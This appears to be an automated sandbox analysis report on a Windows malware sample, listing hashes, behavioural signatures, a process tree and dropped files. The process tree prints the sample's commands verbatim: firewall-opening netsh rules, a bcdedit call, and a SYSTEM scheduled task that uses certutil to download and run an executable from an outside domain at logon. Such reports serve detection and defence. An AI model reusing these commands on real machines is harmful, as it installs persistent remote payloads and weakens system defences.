Analysis
-
max time kernel
41s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 02:43
Static task
static1
Behavioral task
behavioral1
Sample
40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
Resource
win10v2004-20220414-en
General
-
Target
40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
-
Size
3.8MB
-
MD5
900302a2aa483020ee88f0bc7547baf1
-
SHA1
413d13f3ed8f330384b9354291cec2efa335342f
-
SHA256
40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2
-
SHA512
556e6c523ba9be1ce39147f34d4859b45cacc9cb2e2ffce5ca90a7eafd821d7ec0d06be7529e6853f445b1acc80d842b987f896f748830ebf8a4d58fb0ec73d4
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 2988 created 3104 2988 svchost.exe 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 3544 bcdedit.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3464 3104 WerFault.exe 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe 864 4364 WerFault.exe 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1596 schtasks.exe 4544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exepid process 3104 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe 3104 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe 4364 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe 4364 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exesvchost.exedescription pid process Token: SeDebugPrivilege 3104 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe Token: SeImpersonatePrivilege 3104 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe Token: SeTcbPrivilege 2988 svchost.exe Token: SeTcbPrivilege 2988 svchost.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
svchost.exedescription pid process target process PID 2988 wrote to memory of 4364 2988 svchost.exe 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe PID 2988 wrote to memory of 4364 2988 svchost.exe 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe PID 2988 wrote to memory of 4364 2988 svchost.exe 40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe"C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe"C:\Users\Admin\AppData\Local\Temp\40485d4893e7a60b7d0898657abf820d9b67418aecd4279128699549c79817c2.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 6763⤵
- Program crash
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 8802⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3104 -ip 31041⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4364 -ip 43641⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.6MB
MD53ec1b10862b9d136145adfada8b8e209
SHA138ccaeb776d11692a52906469b22d287a3ca55a2
SHA256edfbf81cfb2525e5d47ea72b17640e4d80a55ee604394f3442c87241d417c4c4
SHA512f454100d2564ca43be78f37ee36ad830dbeb7215770c865785a64053bcfb5634b112782eecfb70c21cec3ce82b5100f477929bbeac7578e3d31bcbbe530bf46b
-
C:\Windows\rss\csrss.exeFilesize
1.6MB
MD5ed616af4c080b62fb6a36b40b5606c7d
SHA19df7fee4983396769d23ce468bb63c9e691806a8
SHA2569edf27690b361e6470a65717e88f8665e561bc1345f89dc5d7d1b7d8bb543d8d
SHA512ecc9f144eadb8abd917c3f75abc7065495270a32010e389b675c3313b94185196d1daca81f1473b48f27f546bee9cd1ff5de5d6bd6da88c839a75870ff4f8bcb
-
C:\Windows\rss\csrss.exeFilesize
1.5MB
MD561ecf4f4abeacd59e6888688559218de
SHA16ee1ea6e53e2e06747444cea94e33a72f2c6b80c
SHA256641a41b15724aeff9e7c341c9bdf4d167337c9b8936c186ba7bd6c428be7d7ae
SHA5120a5d68ada05ece2155e40e194e8c8995058f0291efb5ac1ec18091063ec29cbf436e4550b00bc5c36183c4a0a8bc09a750eed545ef8500b559f87a76da39f909
-
memory/1596-144-0x0000000000000000-mapping.dmp
-
memory/2592-145-0x0000000001400000-0x00000000017A6000-memory.dmpFilesize
3.6MB
-
memory/2592-146-0x0000000000400000-0x0000000000BFD000-memory.dmpFilesize
8.0MB
-
memory/2592-140-0x0000000000000000-mapping.dmp
-
memory/3104-132-0x0000000000400000-0x0000000000BFD000-memory.dmpFilesize
8.0MB
-
memory/3104-131-0x00000000012D0000-0x00000000019C5000-memory.dmpFilesize
7.0MB
-
memory/3104-130-0x0000000000F1E000-0x00000000012C4000-memory.dmpFilesize
3.6MB
-
memory/3544-149-0x0000000000000000-mapping.dmp
-
memory/3620-134-0x0000000000000000-mapping.dmp
-
memory/3788-147-0x0000000000000000-mapping.dmp
-
memory/4364-136-0x000000000104D000-0x00000000013F3000-memory.dmpFilesize
3.6MB
-
memory/4364-137-0x0000000000400000-0x0000000000BFD000-memory.dmpFilesize
8.0MB
-
memory/4364-133-0x0000000000000000-mapping.dmp
-
memory/4508-138-0x0000000000000000-mapping.dmp
-
memory/4544-143-0x0000000000000000-mapping.dmp
-
memory/4844-135-0x0000000000000000-mapping.dmp
-
memory/4888-139-0x0000000000000000-mapping.dmp